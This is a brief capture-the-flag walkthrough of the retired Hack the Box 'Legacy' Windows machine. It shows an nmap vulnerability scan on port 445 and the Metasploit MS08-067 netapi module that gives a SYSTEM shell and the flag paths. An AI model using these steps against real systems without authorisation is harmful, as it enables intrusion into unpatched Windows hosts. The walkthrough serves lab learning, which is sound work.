Hack the Box – Legacy Walkthrough

Today we’re going to solve another CTF machine “Legacy”. It is now retired box and can be accessible if you’re a VIP member.



  • Target OS: WIndows
  • Services: netbios-ssn, microsoft-ds, ms-wbt-server
  • IP Address:
  • Difficulty: Easy


  • 445: MS08-67


  • Getting user
  • Getting root


As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

host port proto name state info ---- ---- ----- ---- ----- ---- 139 tcp netbios-ssn open Microsoft Windows netbios-ssn 445 tcp microsoft-ds open Windows XP microsoft-ds 3389 tcp ms-wbt-server closed

Mainly in many origination port serious from 135 to 139 are blocked in network for security reasons, therefore port 445 is used for sharing data in network. Now identify whether it is vulnerable to MS08-67 using nmap as show in given image.

nmap --script vuln -p445 -Pn

We found our host is vulnerable to MS08-67, and we can easily exploit the target…


So we’re gonna use metasploit module and exploit this vulnerability.

Module: exploit/windows/smb/ms08_067_netapi

use exploit/windows/smb/ms08_067_netapi

And we got our shell and we’re already NT Authority .

User: C:\Documents and Settings\john\Desktop\user.txt​

Root: C:\Documents and Settings\Administrator\Desktop\root.txt